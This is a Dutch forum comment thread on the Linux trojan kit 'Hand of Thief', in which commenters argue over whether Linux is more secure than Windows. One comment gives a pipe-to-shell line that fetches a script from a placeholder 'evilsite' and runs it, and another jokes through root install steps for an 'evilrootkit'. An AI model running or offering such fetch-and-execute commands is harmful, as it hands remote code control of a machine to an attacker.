Daarnaast logt Linux veel en heb je bijvoorbeeld ook progjes als snort (of Psad voor lokale pc''s) en de uitbreidingen op Iptables.

En bijvoorbeeld deze voor mallware: http://www.rfxn.com/projects/linux-malware-detect/

Daarnaast heb je IDS systemen zoals: LIDS, http://en.wikipedia.org/w...ntrusion_Detection_System
En bijvoorbeeld tripwire.

Aangezien desktop OS super snel gepatched worden en de beveiliging ook vaak idd voldoende is (al is de gebruiker de zwakste schakel natuurlijk)
Gok ik er op dat dit meer voor embedded systemen geld: Waaronder android, maar ook routers, set op boxen enz. Immers vaak wordt daar juist de beveiliging weggelaten om alles sneller te laten lopen en batterij en ruimte te besparen.

Ik weet niet hoe de prijzen nu zijn maar 3000 Dollar voor een Linux trojan kit vindt ik nauw niet goedkoop maar ook niet echt duur op de zwarte markt.

Maar het linke is wel als je een andere linux bak hackt er geen counter hack plaats vindt. Want dan ben je dus wel de pineut. En dat gebeurt een stukje sneller op linux dan op windows.

[Reactie gewijzigd door rob12424 op 11 augustus 2013 18:55]

Meeste Russen komen simpeltjes binnen via het filesysteem.

Deze malware kit ljkt meer iets voor simpele criminelen, wat het niet simpeler erop maakt 'm te detecteren.

De meeste linux distro's zitten online op 1 of andere manier al dan niet semi-online via netwerk.

Dat betekent dat er resources automatisch van internet gedownload worden. Dus zo'n distro hacken is dan fluitje van cent, als de crimineel weet welke machine op welke plek die OS versie X Y Z draait...

Debian is enige distro met alles open source. Wat ik meestal doe is alles op DVD kwakken en niks downloaden, maar da's ook geen sinecure tegenwoordig. Hele bendes DVD's.

Dan strippen kernel en strippen services - dat lukt 99% van de linux gebruikers niet.

De afgelopen jaren is ook die distro zo lek als een mandje geraakt. Het is nog niet zo erg als ubuntu maar toch. De heel wat oudere debians waren heel wat veiliger in dat opzicht. Nu zijn er ook allerlei dingen die default je machine hacken, als er alleen maar verdachte pakketjes naar binnen komen. Dat is de ellende met die kernel. Er hoeft dan maar 1 service te draaien en je machine wordt volautomatisch gehackt.

Wat de NSA lukt, lukt op gegeven moment tenslotte ook het criminele gilde. Kwestie van scanner draaien op je netwerk, tot je bepaalde pakketjes ziet voorbij komen. Die opschrijven en dan die grap zelf gebruiken.

Die lekken dicht je gewoon niet.

Wat wel opvallend is, is dat het ineens op het internet ligt dat je linux hacks kunt kopen online. Dat is een kwalijke zaak.
Ik kan zo een user -> root expoit noemen.

sudo -s
draait de gebruikers .bashrc script als root.
Dus een lame command als

wget -q -O - evilsite/evilScript.sh | bash

kan al voldoende zijn.

[Reactie gewijzigd door daft_dutch op 12 augustus 2013 09:49]

hoezo een exploit? Dit is hooguit een trojan te noemen gezien je zelf eerst de terminal naar root moet zetten (sudo -s).
Dat is geen exploit, dat is een feature van sudo :D
Binnen Linux zit je om de haverklap commandos uit te voeren als SU/SUDO. Een vals script is zo geinstalleerd. Printerdriver installeren en je bent 15 minuten scripts aan het draaien en bestanden van allerlei websites aan het installeren. Wel eens met je opmerking over de 'winkel'.
Maar goed soms wil/moet je iets installeren dat niet in de winkel staat.

Wellicht is deze malware trouwens bedoeld voor systemen die bij banken draaien. Niet gericht op consumers.
99% vd printer drivers is gewoon al geinstalleerd, ik draai 10+ jaar linux en heb nog nooit printerdriver scriptjes hoeven downloaden van onbekende sites
Ikzelf wel van een andere plek dan de repositories, omdat de driver daar zoog, maar dan nog kwam de driver gewoon van de website van Canon af. Hoort nog steeds even veilig te zijn.
O brother were are thou drivers?
bf7 etc..
Kunnen we dat dan ook niet gewoon zeggen over Windows, en dan is dit statement:

"Linux-softwarearchitectuur door de meeste beveiligingsonderzoekers als veiliger gezien"

nogal lomp, als je het in die context plaatst. Hoe komen ze er überhaupt bij dat het veiliger zou zijn? Met benchmarks? Ik denk dat we wel allemaal goed genoeg weten dat de enige benchmark de real-life benchmark is en ik denk niet dat Linux daar nu voldoende data voor heeft tegenover Windows en OS X.
Die zin betekent dat de structuur door deskundigen (ben ik niet) als veiliger wordt gezien. Of het in de praktijk ook veiliger is hangt van meer af, hoeveel malware er voor in omloop is, hoe snel er gepatcht wordt, etc.

Linux heeft op servers ongeveer een derde van de markt. Lijkt me ruim voldoende om een oordeel over de praktijk op te baseren.
Die zin betekent dat de structuur door deskundigen (ben ik niet) als veiliger wordt gezien.
Echte deskundigen zouden nooit zoiets roepen, want dat valt gewoon niet hard te maken.
Op papier hebben Windows, OS X en linux alle geijkte security features wel, of vallen er wel third-party tools/patches of wat dan ook voor te vinden.
Die verschillen op bepaalde punten dan wel in aanpak en dergelijke, maar dat kun je nooit generaliseren naar een dergelijk statement, en dus zal een deskundige nooit zoiets roepen, want dat valt niet objectief te onderbouwen.
Of het in de praktijk ook veiliger is hangt van meer af, hoeveel malware er voor in omloop is, hoe snel er gepatcht wordt, etc.
Ja, daar zitten de voornaamste verschillen in, niet zozeer op het technische vlak of 'structuur' (wat dat ook voor loze term moge zijn).
Dus is die uitspraak onzin.
"Echte deskundigen zouden nooit zoiets roepen" ... sure, "echte" deskundigen?!

Uiteindelijk is niets hard te maken, maar gelukkig hebben we Ockhams scheermes die ons richting kan geven.

NASA stapt van Windows over op Debian Linux mede vanwege de veiligheid. Onzin uitspraak? Ben nog geen onafhankelijke deskundige tegengekomen die anders beweerde. Daarom zou Ockham anders oordelen.
"Echte deskundigen zouden nooit zoiets roepen" ... sure, "echte" deskundigen?!
Beetje zwak. Dit was duidelijk geen geval hiervan.
Ik geef aan dat mensen met genoeg kennis van de materie zouden weten dat zo'n uitspraak nooit hard te maken is. Die zullen zich veel genuanceerder uiten.
Mensen die roepen dat X beter is dan Y, zijn meestal mensen met een of andere agenda.
NASA stapt van Windows over op Debian Linux mede vanwege de veiligheid
Ah, de agenda komt meteen al boven: Je vergeet er even bij te zetten dat de NASA overstapt van Windows XP, dat in april 2014 geen updates meer krijgt. En ja, iedere deskundige zal het erover eens zijn dat een OS dat geen security patches meer krijgt, niet zo'n geweldige keuze is qua security.

Verder vertelt het artikel vooral dat men al veel meer Linux gebruikt binnen het ISS, dus dat mooi aansluit. Jij probeert dit aan te dragen als een of ander deskundig vergelijk tussen Windows 8 en linux, en dat is het in de verste verte niet.
Hoezo duidelijk?

"Ik geef aan dat mensen met genoeg kennis van de materie zouden weten dat zo'n uitspraak nooit hard te maken is."
Hoe weet je dat dan? Ben je zo'n deskundige?

De beste stuurlui staan aan wal natuurlijk.
"Ik geef aan dat mensen met genoeg kennis van de materie zouden weten dat zo'n uitspraak nooit hard te maken is."
Hoe weet je dat dan? Ben je zo'n deskundige?
Ik zou mezelf niet willen profileren als deskundige op het gebied van security of iets dergelijks, maar als ontwikkelaar ben ik wel goed bekend met de ins en outs van Windows en verschillende UNIX-varianten, ook op het gebied van security (zie mijn posts elders in deze thread, ik ga als een van de weinigen ook nog een beetje inhoudelijk in op dingen als de Windows API, en geef aan waar bepaalde security informatie aan het systeem doorgegeven kan worden bv, waar veel mensen roepen dat dat niet eens in Windows zit. Ironisch genoeg zit dat juist niet in Linux. Neem bv CreateFile() en de open() syscall van linux. Files maken/openen kan in Windows dus wel met security-attributen, en in linux niet).

Laat ik zeggen dat ik er genoeg van weet om in te zien dat deskundigen zoiets niet kunnen gaan roepen. Maar ik gaf al eerder aan waarom:
"Op papier hebben Windows, OS X en linux alle geijkte security features wel, of vallen er wel third-party tools/patches of wat dan ook voor te vinden.
Die verschillen op bepaalde punten dan wel in aanpak en dergelijke, maar dat kun je nooit generaliseren naar een dergelijk statement, en dus zal een deskundige nooit zoiets roepen, want dat valt niet objectief te onderbouwen."

Hier had je dus ook op kunnen reageren, bv door een tegenvoorbeeld te noemen. Maarja, nu zit je gewoon goedkoop op de man te spelen. En op mijn opmerkingen hierboven dat het over Windows XP gaat, ga je niet eens meer in...

[Reactie gewijzigd door Scalibq op 12 augustus 2013 00:19]

Wat denk je dat die mode is ?
http://www.tutorialspoint.com/unix_system_calls/open.htm

Niet een security-attribute ding iig. Alleen de standard 'chmod' flags. Linux heeft standard geen support voor ACLs, en als je dat aftermarket installeert, heeft open() daar dus nog steeds geen support voor, zoals je zelf al aangeeft.

Geldt voor andere objecten nog meer, zoals bv pthread_create(). Je kunt wel attributen meegeven, maar daar zit niets van security bij: http://linux.die.net/man/3/pthread_attr_init

Windows heeft dat natuurlijk wel, want ook hier komen de SECURITY_ATTRIBUTES er meteen weer bij: http://msdn.microsoft.com...op/ms682453(v=vs.85).aspx

Grappig dat die linux-mensen allemaal keihard door de mand vallen wegens gebrek aan kennis.

[Reactie gewijzigd door Scalibq op 12 augustus 2013 12:13]

Leuk een mede ontwikkelaar! Zo veel van Windows weet ik ook niet, ik ben al tijden Linux only, behalve bij lan-party's :P

Maar goed, ik neem aan dat ook Microsoft zijn best doet om security goed te maken. En ik geloof je als je zegt dat security in Windows hedendaags heel goed is.

Echter weet ik ook dat het security-wise niet slim is om van 1 partij afhankelijk te zijn voor je security patches. Dat is wat ze bij NASA zich wellicht ook gerealiseerd hebben. Nu kun je wel zeggen Windows XP, maar waarom geen ander product van Microsoft meer? Omdat ze al Linux hebben vind ik eerlijk gezegd een beetje slap.

Tegelijk gaan ook steeds meer andere bedrijven naar Linux systemen over. Google heeft zelfs beleid om geen Windows te gebruiken vanwege de veiligheid.
En ik geloof je als je zegt dat security in Windows hedendaags heel goed is.
Dan heb je mijn post niet goed gelezen. Ik geef aan dat voor een groot deel de security-features ALTIJD al in Windows NT hebben gezeten. Dus niet alleen 'hedendaags'.
Nu kun je wel zeggen Windows XP, maar waarom geen ander product van Microsoft meer? Omdat ze al Linux hebben vind ik eerlijk gezegd een beetje slap.
Ze zullen hun redenen ervoor hebben, er werd ook iets genoemd dat ze het makkelijker zelf kunnen aanpassen. Maar dat is net als het feit dat op het ISS al meer linux gebruikt wordt, niet iets dat met security te maken heeft.
Tegelijk gaan ook steeds meer andere bedrijven naar Linux systemen over. Google heeft zelfs beleid om geen Windows te gebruiken vanwege de veiligheid.
Google is altijd al een linux-bedrijf geweest, dat zou niemand moeten verbazen (en sinds Android/ChromeOS dus ook een concurrent van Microsoft op het gebied van OSen). Dat heeft natuurlijk ook met elkaar te maken: geen Windows-kennis in huis, dus ook geen goede infrastructuur om daar met Windows-machines op in te loggen en security policies te forceren.
Dus dan is de veiligheid automatisch lager dan bij een bedrijf dat wel op Windows draait, en al goede security policies op het LAN heeft etc. Daar zouden ze waarschijnlijk eerder linux-machines willen weren, omdat ze daar geen controle over hebben.

[Reactie gewijzigd door Scalibq op 12 augustus 2013 12:09]

Dan heb je mijn post niet goed gelezen. Ik geef aan dat voor een groot deel de security-features ALTIJD al in Windows NT hebben gezeten. Dus niet alleen 'hedendaags'.
Ik had het helemaal niet over security features maar over security in het algemeen. Ik doe uitspraken over de architectuur in zijn algemeenheid, niet dat ene aspect.

[Reactie gewijzigd door tuXzero op 13 augustus 2013 14:55]

Ik doe uitspraken over de architectuur in zijn algemeenheid, niet dat ene aspect
Ik heb je anders nog geen enkele concrete uitspraak over iets qua security-architectuur of wat dan ook zien doen.
Daar ben je vast ook niet toe in staat.
Ik ben geen beveiligingsonderzoeker maar ik weet genoeg van beveiliging om grote en complexe omgevingen veilig te maken. Ik ontwikkel over het algemeen cloud software. En ACL op OS laag is dan ook helemaal niet zo interessant omdat deze vaak in de cloud software zelf zit. Dingen die ik belangrijker vind zijn dit:

1. Hoeveel kan ik uit het OS slopen?

Als er een probleem in het OS zit:
2. Hoe snel kan ik dat oplossen.
3. Kan ik zelf deskundigen aanstellen om het probleem op te lossen.

Al deze punten hebben met veiligheid te maken. En bij Windows moet er ook veel beter getest worden omdat Windows één product is met vele gebruikers. Een patch voor mijn cloud hoeft alleen voor mij te werken en niet voor andere Linux gebruikers, maar dankzij de GPL kunnen zij daar ook van profiteren!

En Microsoft zal daar vast een programma voor hebben. Maar ik ben dan zo'n vervellende klant die voor een dubbeltje op de eerst rij wil zitten en geen tienduizenden euro's wilt afrekenen.

Een bijkomend voordeel is dan ook dat ik mijn patch-providers en deskundige kan selecteren op prijs en kwaliteit. Vanwege de gesloten aard van Windows is dit daar niet mogelijk.
Al deze punten hebben met veiligheid te maken.
Ben ik het niet mee eens.
1. Hoeveel kan ik uit het OS slopen?
Veiligheid is juist het tegenovergestelde: je hoeft dingen niet uit het OS te slopen als ze toch al veilig zijn, omdat de 'architectuur in zijn algemeenheid' goed is.
Als er een probleem in het OS zit:
Dan heeft de 'architectuur in zijn algemeenheid' dus eigenlijk al gefaald, en probeer je het met lapmiddelen.

Dus je argumenten ondersteunen je eerdere claims niet. Wederom heb je NIETS over security/architectuur gezegd.
Alleen maar flauwe inkoppertjes over services 'eruit slopen' en dingen patchen. Tsja, ook iemand die niets van security weet, had dat nog op kunnen noemen.

[Reactie gewijzigd door Scalibq op 13 augustus 2013 22:26]

Veiligheid is juist het tegenovergestelde: je hoeft dingen niet uit het OS te slopen als ze toch al veilig zijn, omdat de architectuur goed is.
Wat er niet is kan ook geen exploit herbergen. Zo kunnen drivers of andere componenten uit de kernel als ze niet gebruikt worden. Het is immers niet te bewijzen dat een architectuur 100% veilig is.
Dan heeft de 'architectuur in zijn algemeenheid' dus eigenlijk al gefaald, en probeer je het met lapmiddelen.
Welkom in de praktijk. Ze worden niet voor niets patches (pleisters) genoemd. En ja Windows heeft ze ook (misschien onder een andere naam).

Ik ben bang dat ik je niet ga overtuigen met mijn argumenten en heb niet alle tijd van de wereld dus ik ga er mee stoppen.

edit:
- toegevoegd "of andere componenten"

[Reactie gewijzigd door tuXzero op 14 augustus 2013 09:03]

Wat er niet is kan ook geen exploit herbergen. Zo kunnen drivers uit de kernel als ze niet gebruikt worden. Het is immers niet te bewijzen dat een architectuur 100% veilig is.
Ja, dat snapt een kind van 4 ook... Maar je zat net allerlei dingen te roepen over architectuur, en nu weet je daar niet dieper op in te gaan.

Ik denk dat je Windows wel een hip systeem zult vinden dan. In tegenstelling tot linux worden er geen drivers in de kernel gecompileerd, maar worden alle drivers per definitie dynamisch geladen (of niet, als je ze disablet in Device Manager).
Lijkt me vanuit het oogpunt van architectuur best aardig, niet?
Ik ben bang dat ik je niet ga overtuigen met mijn argumenten en heb niet alle tijd van de wereld dus ik ga er mee stoppen.
Je argumenten sluiten niet aan op je eigen beweringen, daar ga je niemand mee overtuigen. Je betoog is gewoon niet logisch consistent.

[Reactie gewijzigd door Scalibq op 13 augustus 2013 23:02]

Windows NT en alle varianten gebruiken een hybride kernel. Onder Linux wordt een microkernel gebruikt. Je ziet ook verschillen over hoe processen en services te werk gaan.

Onder Windows draaien dingen vaak onder Local System Account. Je hebt ook de account Administrator. Die zogenaamd de baas is, als je onder die account zegt, "kill dit process" dan staat hij vaak nog een tijd te denken en te vragen.

Onder UNIX/Linux is onder root een "kill -9" direct. Er bestaat daar ook geen Local System account of zoiets dergelijks.

De security parameters voor bestanden bij creatie zijn leuk, maar de parameters moeten ook nog door een technische implementatie worden opgepakt. NTFS partities kon je vroeger gewoon uitlezen met een Linux boot CD.

Ik deel je mening niet dat het niet hard te maken is, niet echt.
Om te beginnen heeft de Linux gemeenschap veel meer ontwikkelaars en daardoor ook een grotere controlegroep. Ook hebben de besturingssystemen van origine een hele andere filosofische benadering. Onder UNIX/Linux mag de gebruiker van oorsprong zo goed als niks, terwijl onder de Windows de gebruiker alles mocht.

(De Windows9X familie had niet eens security, alleen maar system, Archive en read-only vlaggetjes.)
Onder Linux wordt een microkernel gebruikt
Nee, onder Linux wordt een monolitische kernel gebruikt, het tegenovergestelde van een microkernel. Hoe kun je DAT nou niet weten?
Ohja, ik zie het al, er komt weer zo'n pro-linux betoog aan. Dat kan alleen maar komen van mensen die er geen verstand van hebben.
NTFS partities kon je vroeger gewoon uitlezen met een Linux boot CD.
Lijkt me toch logisch? Op een HDD is alles uiteindelijk gewoon ruwe data. Als je dat gewoon op een laag niveau uitleest, kun je overal bij. Net zoals je een filesysteem ook op een ander system kunt mounten waar je WEL alle rechten hebt, en dan kun je gewoon de eigenaar/rechten aanpassen zodat je overal bij kunt.
Dat heeft weinig te maken met het OS of het filesysteem zelf.
Het enige dat daar tot op zekere hoogte tegen helpt, is encryptie, zodat de ruwe data niet direct zinvol te interpreteren valt. En dat ondersteunt NTFS natuurlijk ook.
Om te beginnen heeft de Linux gemeenschap veel meer ontwikkelaars en daardoor ook een grotere controlegroep
Daar spreken de feiten je tegen, helaas. Er zijn enorm veel voorbeelden te noemen van vrij triviale bugs die pas na vele jaren gevonden en/of gefixt worden.

Ook zijn er genoeg voorbeelden te noemen van Linux-gerelateerde software, die na vele jaren nog steeds niet op het niveau is van Windows-broertjes.
Dan kan ik bv open source video drivers noemen, of volwaardige vervangers van iets als Photoshop, 3dsmax, Cubase, etc.

Als er echt zo veel ontwikkelaars waren (met genoeg skills), dan hadden de open source-varianten allang de commerciele software buitenspel gezet (al was het maar met open source software op Windows).
Ook hebben de besturingssystemen van origine een hele andere filosofische benadering. Onder UNIX/Linux mag de gebruiker van oorsprong zo goed als niks, terwijl onder de Windows de gebruiker alles mocht.
Ze hebben zeker een andere filosofische benadering, maar dit is juist NIET het verschil.
Windows NT is juist WEL van origine net als UNIX opgezet als multi-user systeem, met alle regelingen van toegang etc die daar bij komen kijken.
Verwijzen naar eerdere versies van Windows is een beetje nutteloos, aangezien Windows NT een compleet andere API gebruikt dan die eerdere versies van Windows. In feite is het gewoon een compleet ander OS.
(De Windows9X familie had niet eens security, alleen maar system, Archive en read-only vlaggetjes.)
Die zijn dan ook geen lid van de Windows NT-familie, en dus hebben ze niets te maken met NT. Ze hadden wel een beperkte implementatie van de Win32API van NT, waar ook alle security-features in zitten. In 9x werden alleen die security-parameters genegeerd. Het was immers geen Windows NT-technologie.

[Reactie gewijzigd door Scalibq op 13 augustus 2013 11:43]

Ik wist dat Linux van origine een monolitische kernel heeft. Alleen niet dat het nu nog steeds het geval is. Het is in ieder geval geen hybride kernel, dus er is nog steeds een gigantisch verschil tussen NT en Linux.

Die NTFS partities werden door MS marketing verkocht als veilig. Je kon als onbevoegde niet bij de bestanden als je de computer gestolen had of zoiets dergelijks.

Je gooit voor de rest van je verhaal Linux en GNU software door elkaar.

Ook had ik het over de Microsoft bedrijfsfilosofie tov al hun software "Alles moet kunnen"
Niet specifiek over de WIndows NT familie. Anders slaat die referentie naar de Windows 9x familie inderdaad nergens op ;)
Alleen niet dat het nu nog steeds het geval is.
Natuurlijk is dat nog steeds zo. Anders is het geen linux kernel meer.
Het is in ieder geval geen hybride kernel, dus er is nog steeds een gigantisch verschil tussen NT en Linux.
Weet je wel wat hybride betekent in de context van NT?
Dat betekent dat NT van oorsprong een microkernel-ontwerp was, maar dat er compromissen gesloten zijn om bepaalde dingen in kernel-mode te doen ipv usermode, voor betere performance (performance is altijd een teer punt geweest van microkernels, en vrijwel alle praktische implementaties doen dergelijke concessies aan het ontwerp).

NT zit een stuk dichter bij het ideaal van een microkernel dan linux, dus ik snap je betoog niet (en de geleerden zijn het wel over eens dat een microkernel bepaalde voordelen kan hebben op het gebied van security). Tenminste, ik krijg de indruk dat jij het zelf niet snapt.
Ook had ik het over de Microsoft bedrijfsfilosofie tov al hun software "Alles moet kunnen" Niet specifiek over de WIndows NT familie.
Het slaat nog steeds nergens op, aangezien de laatste niet-NT versie van Windows in 2000 gereleased is.
Of moet je nu wel HELE ouwe koeien uit de sloot gaan halen om je punt te willen maken?
Windows 9x bestond puur en alleen om thuisgebruikers de overgang van DOS/Windows 3.x naar NT te laten maken. Aangezien de stap qua hardware-requirements voor NT behoorlijk groot was, kon die stap niet ineens gemaakt worden. De hardware moest eerst sneller en goedkoper worden.

Helaas bleek dat veel software specifiek voor Windows 95/98 ontwikkeld werd, en nooit getest werd op NT (en daar dus ook vaak niet goed op werkte). Hierdoor ging de overgang naar NT nog moeizamer dan Microsoft had gewild.

[Reactie gewijzigd door Scalibq op 14 augustus 2013 00:37]

Benchmarks?

Penetration tests. Google Backtrack. fzo.
Ik zat ook al te denken? Huh? Benchmarks? Dat is toch voor performance? Niet voor beveiliging?
Tenzij de repository van je distro compromised is, dan kunnen kwaadwillenden deze trojan verstoppen in een bestaande package.

Nu is de kans dat dit gebeurd natuurlijk klein, maar hij blijft aanwezig.

[Reactie gewijzigd door Jeffrey op 11 augustus 2013 17:35]

Linux heeft niet echt een goed track record meer, wat dat betreft.
De afgelopen tijd zijn een aantal hele belangrijke/grote sites gehackt, waaronder dus kernel.org, MySQL.com, en pas nog de Ubuntu forums.

Als zelfs dit soort vooraanstaande sites gehackt worden, dan kunnen ze vast ook wel de repository-servers hacken, en geinfecteerde bestanden laten verspreiden. Voorzover dat niet al gebeurt, natuurlijk.
De MySQL.com-site verspreidde ook daadwerkelijk malware trouwens: http://blog.armorize.com/...ecting-visitors-with.html
Het was natuurlijk een kwestie van tijd voordat er ook op de andere 'grote' platformen ook malware aangetroffen ging worden.

Ook al is de Linux community nog miniem ten opzichte van Windows en Mac gebruikers, het is een gestaag groeiende markt. Veel Linux gebruikers die zich juist vanwege het ontbreken van malware en virussen veilig wanen moeten vanaf nu net zo goed gaan oppassen en gaten dichten. Nu is er eenmaal een malware gevonden, het schept een precedent voor toekomstige veiligheidsproblemen.

Ik hoop wel dat de exploit gauw wordt gepatched.
Goh, aangezien de halve wereld van servers (of zelfs meer) op linux draait denk ik echt wel dat het een pak veiliger is dan windows en mac. Het is te belangrijk dat de veiligheid gegerandeerd is en we zouden het al lang gemerkt hebben mocht het simpel zijn om het systeem te besmetten.

Uiteindelijk wordt er nogal veel rook gemaakt voor weinig vuur. Het is aan de gebruiker om waakzaam te zijn op wat ie toestaat. Je moet toch raar opkijken als plots gevraagd wordt om je master password... Das toch net hetzelfde dat je bij het betalen met bankcontact eerst naar het bedrag kijkt alvorens je pin-code in te geven?
Dat veel servers op Linux draaien heeft vooral te maken met betere prestaties, het beter omgaan met meerdere cores bijvoorbeeld.
Neh, goedkoper. Moet je wat meer met een server dan kom je al snel bij een Windows server terecht.
Meeste bedrijven gebruiken redhat als linuxdistro wegens de support. En dat komt duurder uit als een windows server ;)

De enige reden om voor een windowsserver te kiezen is voor het virtueel draaien van windows-programma's...
Neh, goedkoper. Moet je wat meer met een server dan kom je al snel bij een Windows server terecht.
En moet je nog wat meer dan land je weer bij Linux. http://en.wikipedia.org/w...ng_systems#Supercomputers
Dat is nou juist jarenlang een zwak punt geweest van linux, waardoor veel professionele admins eerder naar iets als FreeBSD of Solaris grepen voor x86 servers.
Al eens gecontroleerd of bijv. Linux/Cdorked.A op je "server" mee draait zonder dat jij het weet?
Goh, aangezien de halve wereld van servers (of zelfs meer) op linux draait denk ik echt wel dat het een pak veiliger is dan windows en mac.
Misschien, blijft echter speculatie ... maar laten we er eens een gemiddelde gebruiker achter zetten, een gebruiker met fysieke toegang tot het systeem. Is Linux dan nogsteeds zo ongelooflijk veilig? Hoeveel mensen schakelen wel niet standaard UAC in Windows uit, omdat het zo vervelend is. 'Wanneer mogelijk' zal Jan De Gemiddelde Gebruiker ook gewoon alles als root draaien omdat dat zo ongelooflijk veel vereenvoudigd.
Dat is denk ik ook de reden van het maken van deze trojan..:
De trojan is volgens de makers getest op vijftien verschillende Linux-distributies, waaronder Debian, Fedora en Ubuntu. Ook zou de malware overweg kunnen met diverse desktopomgevingen, zoals KDE en Gnone, en populaire browsers, zoals Firefox en Chromium.
Het gaat volgens mij vooral om de meest populaire desktop omgevingen en Linux distributies. Juist omdat deze meer en meer door mensen worden gebruikt met nét dat beetje minder 'verstand' van besturingssystemen en computers in het algemeen.
Met de grootte van de penetratie gebruikers die zich geen systeembeheerder of alleen al 'bedreven gebruiker' kunnen noemen zal ook het aantal besmettingen toe gaan nemen, er valt immers steeds meer te kraken / halen / stelen / informatie te verzamelen.

Malware of trojans voor servers zullen sowieso een andere doelgroep aanspreken en een ander doel dienen. Doorgaans zullen diegenen met het beheer van servers wel enigszins op de hoogte zijn van de eventuele gevaren op Linux based servers. (uitzonderingen daargelaten uiteraard)

[Reactie gewijzigd door sleezball op 11 augustus 2013 17:56]

De consumenten distro's maken het enorm lastig om als root te kunnen werken. Grafische root login is aan te zetten, maar er is geen GUI voor om dat te kunnen doen.
In de praktijk krijgen die mensen grafische root login dus niet aan de praat en werken ze netjes onder een user account.

In tegenstelling tot bij Windows is onder Linux het vragen van je beheerderswachtwoord zeldzaam. Waardoor het heel erg opvalt als dit een keer gebeurd. Natuurlijk blijf je altijd idioten houden, maar het is meer idiot proof dan Windows.
De root user is in Ubuntu standaard gedisabled:
By default, the Root account password is locked in Ubuntu.
bron

Zelfde geldt voor Mac OS.

Granted, met sudo kun je dezelfde schade aanrichten. Maar zoals iemand eerder al zei, bij Linux hoef je eigenlijk alleen bij beheerderstaken 'sudo' te draaien.
Behalve als je een CD mikt in die machine (of USB stick), dan start hij overnieuw op en heb je volledig root access tot elke willekeurige Ubuntu machine :)
Je doeld op booten van een live cd?
Dan heb je root op die machine ja, mits je de schijf kan mounten.
Tegen zo'n physical access doe je niks.
Dan heb je volledig root access tot elke willekeurige machine die USB of CD boot aan heeft staan.

Dit is onafhankelijk van je distro (maar afhankelijk van je bios settings).
Malware voor linux is zeker niet nieuw, deze bestaat al zeer lang. Het is wel de eerste keer, voor zover bekend, dat een hele kit te koop word aangeboden.

Ook op Linux geld dat een eindgebruiker voorzichtig moet omgaan met hoe hij/zij het systeem gebruikt en aan welke applicaties er vertrouwen word gegeven.
Ik hoop wel dat de exploit gauw wordt gepatched.
uh, ff wakker worden en niet al dan niet per ongeluk leugens verspreiden: ER IS GEEN EXPLOIT GEVONDEN!!!.

Dit gaat er alleen maar om wat voor malware er allemaal geinstalleerd kan worden door de gebruiker zelf, en bij gebrek aan exploit-kits voor Linux, die overigens wel voor Windows verkrijgbaar zijn, raadt de verkoper van deze malware dus ook aan dit via e-mail of social-engineering te verspreiden.
Dit is inderdaad een storm in een glas water.

Het pakket moet geïnstalleerd worden met intensieve social engineering.

Het pakket als attachment in een mailtje met de HOWTO erin hoe je het installeren moet:
$ sudo /bin/bash
# tar xzvf evilrootkit.tar.gz
# make ; make install
# nohup ./bin/evilrootkit &

:+
De doelgroep hiervoor blijkt gebruikers van internetbankieren.
Ik zou juist denken dat deze kit er op gericht is om bepaalde systemen/infrastructuren te hacken.
De interface lijkt ook een beetje op een voor Windows.
Slecht vertaald, bang makerij en compleet overbodig artikel.
Volgens de RSA lijkt daar verandering in te komen met de ontdekking van de nu nog relatief ongevaarlijke trojan. Omdat Hand of Thief momenteel geen kwetsbaarheden ondersteunt, is het voor oplettende Linux-gebruikers nauwelijks gevaarlijk.

[Reactie gewijzigd door Roessie op 11 augustus 2013 17:01]

is het voor oplettende gebruikers nauwelijks gevaarlijk. weet t niet zeker, maar dus ook hier is de gebruiker de zwake schakel, en nauwelijks gevaarlijk klinkt mij niet onschuldig in de oren. voor mallware op windows geld hetzelfde.
Yup en nog erger:
In fact, in a conversation with the malware’s sales agent, he himself suggested using email and social engineering as the infection vector.
Bovendien is het opmerkelijk dat de cybercriminelen zich richten op Linux-systemen: niet alleen is het aantal te treffen systemen veel kleiner dan op Windows draaiende computers, ook wordt de Linux-softwarearchitectuur door de meeste beveiligingsonderzoekers als veiliger gezien en worden beveiligingsgaten door het opensourcekarakter van Linux veelal snel gepatcht.
Komt daarbij ook nog eens dat Linux gebruikers vaak iets meer afweten van zulke IT gerelateerde zaken. Ik wil maar zeggen, mijn bomma gaat niet snel Linux gebruiken.
Over het algemeen wel inderdaad maar niet altijd, mijn broer heeft totaal geen verstand van computers en zijn pc was altijd een groot malware drama, uiteindelijk was ik er zo zat van dat ik er maar linux mint op heb gegooid.
Sindsdien heeft hij geen problemen meer met zijn systeem gehad. (hij weet het root wachtwoord niet ;))
Waarschijnlijk had een nieuwe windows installatie waarbij je hem geen admin rechten geeft hetzelfde effect gehad.
Neen, integendeel, een bijlage bij z'n mail met een .exe bestandje heeft geen vat op zijn Linux os als hij daarop zou klikken.
Voor een windows gebruiker zonder rechten heeft het ook niet veel vat. Daarnaast, mails met executables.... dat is wel erg 1980, en wordt door vrijwel alle moderne windows mail-clients goed afgevangen.
Ik weet voor 99% zeker dat je bomma al jaren Linux gebruikt. Is er een router? 99% kans dat die op Linux draait. Een modem? ook al Linux. Smart TV? wederom Linux. Navigatiesysteem? Linux.

Het artikel slaat nogal de plank mis. Leuk dat die beveiliginsgaten zo snel gepatched worden, het is beetje jammer dat die patches nooit worden geinstalleerd.
99,99% van de routers zal nooit een patch ontvangen.
Smart tv, zit vol lekken( zie recente onderzoeken daarover): geen patches verkrijgbaar en ook nog niet voorzien.

Je stelling klopt dus inderdaad heel aardig.
Niet in deze context. Je router doet niet aan social networking en je Smart TV leest geen email berichten. Deze kit kan dus langskomen maar zal deze appliances nooit aantasten
Valt me nog op dat er tot nu toe niet de verwachtbare "Zie je nu wel dat Linux niet veiliger is dan Windows"-reacties zijn gepost. Ik zal meteen dat fabeltje de wereld uit helpen. Tweakers.net typt leuk wel leuk "Welke exploit Hand of Thief gebruikt, is nog niet duidelijk.", maar het is goed mogelijk dat Hand of Thief een heel simpele exploit gebruikt: de gebruiker, vooral aangezien het virus een trojan is (waarbij doorgaans onoplettendheid van de gebruiker/administrator de grote val is). Verder blijft Windows nog diverse beveiligende features missen. In principe is de architectuur van Linux nog steeds veiliger. Al heb je een virus, het hoort niet zomaar van alles te kunnen doen. Besluiten dat een bestand als programma uit te voeren is kan in principe niet zomaar (tenzij door een tot nu toe onbekende exploit). En programma's/virussen missen ook op Linux allerlei toegang. Waar een virus op Windows als je de rechten een beetje goed managet net niet administratorrechten krijgt, zou een virus op mijn Linux-bak niet eens bij mijn geëmuleerde COM-poorten kunnen, welke ik enkel gebruik om mijn Arduino's te programmeren, laat staan dat het virus al te gemakkelijk toegang zou kunnen krijgen tot gevaarlijker dingen. De geavanceerdere 